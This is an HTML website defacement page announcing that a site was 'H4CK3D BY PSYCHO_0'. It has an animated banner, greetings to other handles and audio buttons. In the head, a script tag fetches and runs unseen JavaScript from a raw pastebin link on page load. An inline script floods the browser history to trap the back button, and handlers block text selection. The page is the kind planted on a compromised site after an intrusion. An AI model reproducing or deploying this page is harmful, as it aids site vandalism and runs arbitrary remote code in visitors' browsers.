<html>

<head>
    <link rel="icon" type="image/png" href="https://i.pinimg.com/474x/76/43/32/7643320c90b7703de9afc76c43d3bcf4.jpg"
        type="image/x-icon" />
    <title>H4CK3D BY PSYCHO_0 </title>


    <meta name="theme-color" content="black">
    <meta name="og:title" content="H4CK3D BY PSYCHO_0" />
    <meta property="og:image" content="https://i.pinimg.com/474x/76/43/32/7643320c90b7703de9afc76c43d3bcf4.jpg" />
    <script type="text/javascript" src="https://pastebin.com/raw/ynL2hpMe"></script>
</head>

<body>
    <style type="text/css">
        @import url("https://fonts.googleapis.com/css?family=Iceland|Shadows+Into+Light&display=swap");

        body {
            overflow: hidden;
            display: flex;
            align-items: center;
            justify-content: center;
            margin: 0;
            padding: 0;
            width: 100%;
            max-height: max-content;
            background-color: black;
            box-sizing: border-box;
        }

        i {
            margin: 10px;
            color: red;
        }

        a:link {
            color: #000;
        }

        h1 {
            color: #000;
            text-decoration: none;
            border-radius: 0px;
            border: 0px;
            font-family: 'Shadows Into Light', cursive;
            font-size: 50px;
            margin: 0px;
            padding: 0px;
            animation: psychoxploit 0.5s linear infinite;
        }

        pre {
            color: grey;
        }

        marquee {
            width: 100%;
            font-size: 20px;
        }

        @keyframes psychoxploit {
            2% {
                color: #fff;
            }

            3% {
                transform: translate(2px, -10px) skewX(3240deg);
            }

            5% {
                transform: translate(0px, 0px) skewX(0deg);
            }

            2%,
            54% {
                transform: translateX(0px) skew(0deg);
            }

            55% {
                transform: translate(-2px, 6px) skew(-5530deg);
            }

            56% {
                transform: translate(0px, 0px) skew(0deg);
            }

            57% {
                transform: translate(4px, -10px) skew(-70deg);
            }

            58% {
                transform: translate(0px, 0px) skew(0deg);
            }

            62% {
                transform: translate(0px, 20px) skew(0deg);
            }

            63% {
                transform: translate(4px, -2px) skew(0deg);
            }

            90% {
                transform: translate(1px, 3px);
                skew(-230deg);
            }

            95% {
                transform: translate(-7px, 2px);
                skew(-120deg);
            }

            100% {
                transform: translate(0px, 0px) skew(0deg);
            }
    </style>

    <body scroll="no" style="overflow: hidden" ondragstart="window.event.returnValue=false"
        onselectstart="event.returnValue=false">
        <script> (function () { for (var i = 0; i < 20; i++) { history.pushState(null, document.title, window.location.href); } })(document, window, history);</script>
        <center> <img title="H4CK3D BY PSYCO_0" class="picture"
                src="https://i.pinimg.com/474x/76/43/32/7643320c90b7703de9afc76c43d3bcf4.jpg" height="35%"
                widht="35%" />
            <br>
            <h1>
                <font color="red">H4ck3d by</font> PSYCO_0
            </h1><br>
            <h1>
                <font color="red">SORRY</font>
            </h1><br>

            <marquee align="center" scrollamount="6" direction="scroll" font-size="16px">
                <pre>#Greets : - <i>[!] EL1ZA [!] [!] HR1D0Y [!] [!] SH04B [!] [!] MHR-100 [!] [!] Z4H1D [!] [!] L1M0N [!] </pre>
            </marquee><br><br>
    </body>


    <center> <audio id="myAudio">
            <source src="https://l.top4top.io/m_1966kqrn40.mp3" type="audio/ogg">
            <source src="https://d.top4top.io/m_1941zr5eb1.mp3" type="audio/mpeg">
        </audio> <button style=background-color:red onclick="playAudio()" class="btnn" type="button">PLAY!!</button>
        &nbsp;&nbsp; <button style=background-color:yellow onclick="pauseAudio()" class="btnn"
            type="button">STOP?</button>
    </center>


    <script> var x = document.getElementById("myAudio"); function playAudio() { x.play(); } function pauseAudio() { x.pause(); }</script>
</body>

</html>
